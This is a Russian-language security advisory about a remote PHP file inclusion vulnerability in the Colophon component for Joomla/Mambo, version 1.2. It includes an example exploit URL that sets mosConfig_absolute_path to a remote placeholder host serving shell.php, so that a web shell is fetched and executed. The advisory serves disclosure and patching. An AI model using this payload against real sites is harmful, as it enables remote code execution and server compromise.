Security Lab

PHP-инклюдинг в Joomla Colophon

Дата публикации:02.08.2006
Дата изменения:24.03.2009
Всего просмотров:4899
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Colophon 1.x (компонент к Joomla)
Уязвимые версии: Joomla Colophon (компонент Joomla) 1.2 и другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

htttp:/victim/administrator/components/com_colophon/
admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

URL производителя: www.schoolastech.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability